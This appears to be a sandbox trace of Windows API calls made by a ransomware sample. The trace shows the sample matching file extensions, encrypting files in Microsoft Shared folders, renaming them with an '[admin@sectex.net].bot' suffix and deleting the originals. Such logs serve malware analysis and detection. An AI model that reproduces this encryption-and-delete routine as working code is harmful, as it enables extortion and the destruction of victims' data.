	[0040.100] lstrlenW (lpString=".xls") returned 4
	[0040.100] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0040.100] lstrlenW (lpString=".xlsx") returned 5
	[0040.100] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1
	[0040.100] lstrlenW (lpString=".ppt") returned 4
	[0040.100] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0040.100] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102
	[0040.100] lstrlenW (lpString=".zip") returned 4
	[0040.100] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0040.100] lstrlenW (lpString=".rar") returned 4
	[0040.101] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0040.101] lstrlenW (lpString=".bz2") returned 4
	[0040.101] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0040.101] lstrlenW (lpString=".7z") returned 3
	[0040.101] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0040.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102
	[0040.101] lstrlenW (lpString=".dbf") returned 4
	[0040.101] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0040.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102
	[0040.101] lstrlenW (lpString=".1cd") returned 4
	[0040.101] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0040.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102
	[0040.101] lstrlenW (lpString=".jpg") returned 4
	[0040.101] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0040.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102
	[0040.101] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102
	[0040.101] lstrlenW (lpString=".doc") returned 4
	[0040.101] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0040.101] lstrlenW (lpString=".docx") returned 5
	[0040.101] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1
	[0040.101] lstrlenW (lpString=".pdf") returned 4
	[0040.101] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0040.101] lstrlenW (lpString=".xls") returned 4
	[0040.101] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0040.101] lstrlenW (lpString=".xlsx") returned 5
	[0040.101] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1
	[0040.102] lstrlenW (lpString=".ppt") returned 4
	[0040.102] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0040.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102
	[0040.102] lstrlenW (lpString=".zip") returned 4
	[0040.102] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0040.102] lstrlenW (lpString=".rar") returned 4
	[0040.102] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0040.102] lstrlenW (lpString=".bz2") returned 4
	[0040.102] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0040.102] lstrlenW (lpString=".7z") returned 3
	[0040.102] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0040.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102
	[0040.102] lstrlenW (lpString=".dbf") returned 4
	[0040.102] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0040.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102
	[0040.102] lstrlenW (lpString=".1cd") returned 4
	[0040.102] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0040.102] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\WordMUI.XML") returned 102
	[0040.102] lstrlenW (lpString=".jpg") returned 4
	[0040.102] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0040.102] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0040.102] lstrlenW (lpString="DATES.XML") returned 9
	[0040.103] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0040.103] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=8918) returned 1
	[0040.103] CloseHandle (hObject=0x1b0) returned 1
	[0040.103] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml")) returned 0x20
	[0040.103] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0040.103] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0
	[0040.104] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.104] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.104] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0040.106] GetLastError () returned 0x0
	[0040.106] ReadFile (in: hFile=0x1b0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x22d6, lpOverlapped=0x0) returned 1
	[0040.108] WriteFile (in: hFile=0x1a0, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x22e0, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x22e0, lpOverlapped=0x0) returned 1
	[0040.109] ReadFile (in: hFile=0x1b0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0040.109] WriteFile (in: hFile=0x1a0, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0040.109] SetEndOfFile (hFile=0x1a0) returned 1
	[0040.110] CloseHandle (hObject=0x1a0) returned 1
	[0040.111] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.111] SetEndOfFile (hFile=0x1b0) returned 1
	[0040.112] CloseHandle (hObject=0x1b0) returned 1
	[0040.112] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0040.112] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml")) returned 1
	[0040.113] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77
	[0040.113] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77
	[0040.113] lstrlenW (lpString=".doc") returned 4
	[0040.113] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0040.113] lstrlenW (lpString=".docx") returned 5
	[0040.113] lstrcmpiW (lpString1=".docx", lpString2="S.XML") returned -1
	[0040.113] lstrlenW (lpString=".pdf") returned 4
	[0040.113] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0040.113] lstrlenW (lpString=".xls") returned 4
	[0040.113] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0040.113] lstrlenW (lpString=".xlsx") returned 5
	[0040.113] lstrcmpiW (lpString1=".xlsx", lpString2="S.XML") returned -1
	[0040.113] lstrlenW (lpString=".ppt") returned 4
	[0040.113] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0040.113] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77
	[0040.113] lstrlenW (lpString=".zip") returned 4
	[0040.113] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0040.113] lstrlenW (lpString=".rar") returned 4
	[0040.113] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0040.113] lstrlenW (lpString=".bz2") returned 4
	[0040.113] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0040.113] lstrlenW (lpString=".7z") returned 3
	[0040.113] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0040.113] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77
	[0040.113] lstrlenW (lpString=".dbf") returned 4
	[0040.113] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0040.113] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77
	[0040.113] lstrlenW (lpString=".1cd") returned 4
	[0040.114] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0040.114] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77
	[0040.114] lstrlenW (lpString=".jpg") returned 4
	[0040.114] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0040.114] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77
	[0040.114] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77
	[0040.114] lstrlenW (lpString=".doc") returned 4
	[0040.114] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0040.114] lstrlenW (lpString=".docx") returned 5
	[0040.485] lstrcmpiW (lpString1=".docx", lpString2="S.XML") returned -1
	[0040.486] lstrlenW (lpString=".pdf") returned 4
	[0040.486] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0040.486] lstrlenW (lpString=".xls") returned 4
	[0040.486] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0040.486] lstrlenW (lpString=".xlsx") returned 5
	[0040.486] lstrcmpiW (lpString1=".xlsx", lpString2="S.XML") returned -1
	[0040.486] lstrlenW (lpString=".ppt") returned 4
	[0040.486] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0040.486] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77
	[0040.486] lstrlenW (lpString=".zip") returned 4
	[0040.486] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0040.486] lstrlenW (lpString=".rar") returned 4
	[0040.486] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0040.486] lstrlenW (lpString=".bz2") returned 4
	[0040.486] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0040.486] lstrlenW (lpString=".7z") returned 3
	[0040.486] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0040.486] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77
	[0040.486] lstrlenW (lpString=".dbf") returned 4
	[0040.486] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0040.486] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77
	[0040.486] lstrlenW (lpString=".1cd") returned 4
	[0040.486] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0040.486] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77
	[0040.486] lstrlenW (lpString=".jpg") returned 4
	[0040.486] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0040.487] lstrcmpiW (lpString1=".gif", lpString2=".bot") returned 1
	[0040.487] lstrlenW (lpString="Connectivity.gif") returned 16
	[0040.487] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0040.487] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=2319) returned 1
	[0040.487] CloseHandle (hObject=0x1a0) returned 1
	[0040.487] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif")) returned 0x20
	[0040.487] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0040.487] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\connectivity.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0040.487] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74
	[0040.487] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74
	[0040.487] lstrlenW (lpString=".doc") returned 4
	[0040.487] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1
	[0040.487] lstrlenW (lpString=".docx") returned 5
	[0040.487] lstrcmpiW (lpString1=".docx", lpString2="y.gif") returned -1
	[0040.487] lstrlenW (lpString=".pdf") returned 4
	[0040.487] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1
	[0040.487] lstrlenW (lpString=".xls") returned 4
	[0040.488] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1
	[0040.488] lstrlenW (lpString=".xlsx") returned 5
	[0040.488] lstrcmpiW (lpString1=".xlsx", lpString2="y.gif") returned -1
	[0040.488] lstrlenW (lpString=".ppt") returned 4
	[0040.488] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1
	[0040.488] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74
	[0040.488] lstrlenW (lpString=".zip") returned 4
	[0040.488] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1
	[0040.488] lstrlenW (lpString=".rar") returned 4
	[0040.488] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1
	[0040.488] lstrlenW (lpString=".bz2") returned 4
	[0040.488] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1
	[0040.488] lstrlenW (lpString=".7z") returned 3
	[0040.488] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1
	[0040.488] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74
	[0040.488] lstrlenW (lpString=".dbf") returned 4
	[0040.488] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1
	[0040.488] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74
	[0040.488] lstrlenW (lpString=".1cd") returned 4
	[0040.488] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1
	[0040.488] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74
	[0040.488] lstrlenW (lpString=".jpg") returned 4
	[0040.488] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1
	[0040.488] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74
	[0040.488] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74
	[0040.488] lstrlenW (lpString=".doc") returned 4
	[0040.488] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1
	[0040.488] lstrlenW (lpString=".docx") returned 5
	[0040.488] lstrcmpiW (lpString1=".docx", lpString2="y.gif") returned -1
	[0040.488] lstrlenW (lpString=".pdf") returned 4
	[0040.488] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1
	[0040.488] lstrlenW (lpString=".xls") returned 4
	[0040.489] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1
	[0040.489] lstrlenW (lpString=".xlsx") returned 5
	[0040.489] lstrcmpiW (lpString1=".xlsx", lpString2="y.gif") returned -1
	[0040.489] lstrlenW (lpString=".ppt") returned 4
	[0040.489] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1
	[0040.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74
	[0040.489] lstrlenW (lpString=".zip") returned 4
	[0040.489] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1
	[0040.489] lstrlenW (lpString=".rar") returned 4
	[0040.489] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1
	[0040.489] lstrlenW (lpString=".bz2") returned 4
	[0040.489] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1
	[0040.489] lstrlenW (lpString=".7z") returned 3
	[0040.489] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1
	[0040.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74
	[0040.489] lstrlenW (lpString=".dbf") returned 4
	[0040.489] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1
	[0040.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74
	[0040.489] lstrlenW (lpString=".1cd") returned 4
	[0040.489] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1
	[0040.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Connectivity.gif") returned 74
	[0040.489] lstrlenW (lpString=".jpg") returned 4
	[0040.489] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1
	[0040.489] lstrcmpiW (lpString1=".ini", lpString2=".bot") returned 1
	[0040.489] lstrlenW (lpString="Desktop.ini") returned 11
	[0040.489] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0040.490] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=645) returned 1
	[0040.490] CloseHandle (hObject=0x1a0) returned 1
	[0040.490] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini")) returned 0x26
	[0040.490] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0040.490] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0
	[0040.490] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.490] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.490] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc
	[0040.490] GetLastError () returned 0x0
	[0040.490] ReadFile (in: hFile=0x1a0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x285, lpOverlapped=0x0) returned 1
	[0040.491] WriteFile (in: hFile=0x1fc, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x290, lpOverlapped=0x0) returned 1
	[0040.492] ReadFile (in: hFile=0x1a0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0040.492] WriteFile (in: hFile=0x1fc, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0040.492] SetEndOfFile (hFile=0x1fc) returned 1
	[0040.492] CloseHandle (hObject=0x1fc) returned 1
	[0040.495] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.495] SetEndOfFile (hFile=0x1a0) returned 1
	[0040.496] CloseHandle (hObject=0x1a0) returned 1
	[0040.496] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x26) returned 1
	[0040.496] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini")) returned 1
	[0040.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69
	[0040.496] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69
	[0040.496] lstrlenW (lpString=".doc") returned 4
	[0040.496] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1
	[0040.496] lstrlenW (lpString=".docx") returned 5
	[0040.496] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1
	[0040.497] lstrlenW (lpString=".pdf") returned 4
	[0040.497] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1
	[0040.497] lstrlenW (lpString=".xls") returned 4
	[0040.497] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1
	[0040.497] lstrlenW (lpString=".xlsx") returned 5
	[0040.497] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1
	[0040.497] lstrlenW (lpString=".ppt") returned 4
	[0040.497] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1
	[0040.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69
	[0040.497] lstrlenW (lpString=".zip") returned 4
	[0040.497] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1
	[0040.497] lstrlenW (lpString=".rar") returned 4
	[0040.497] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1
	[0040.497] lstrlenW (lpString=".bz2") returned 4
	[0040.497] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1
	[0040.497] lstrlenW (lpString=".7z") returned 3
	[0040.497] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1
	[0040.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69
	[0040.497] lstrlenW (lpString=".dbf") returned 4
	[0040.497] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1
	[0040.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69
	[0040.497] lstrlenW (lpString=".1cd") returned 4
	[0040.497] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1
	[0040.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69
	[0040.497] lstrlenW (lpString=".jpg") returned 4
	[0040.497] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1
	[0040.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69
	[0040.497] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69
	[0040.497] lstrlenW (lpString=".doc") returned 4
	[0040.497] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1
	[0040.497] lstrlenW (lpString=".docx") returned 5
	[0040.497] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1
	[0040.497] lstrlenW (lpString=".pdf") returned 4
	[0040.498] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1
	[0040.498] lstrlenW (lpString=".xls") returned 4
	[0040.498] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1
	[0040.498] lstrlenW (lpString=".xlsx") returned 5
	[0040.498] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1
	[0040.498] lstrlenW (lpString=".ppt") returned 4
	[0040.498] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1
	[0040.498] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Desktop.ini") returned 69
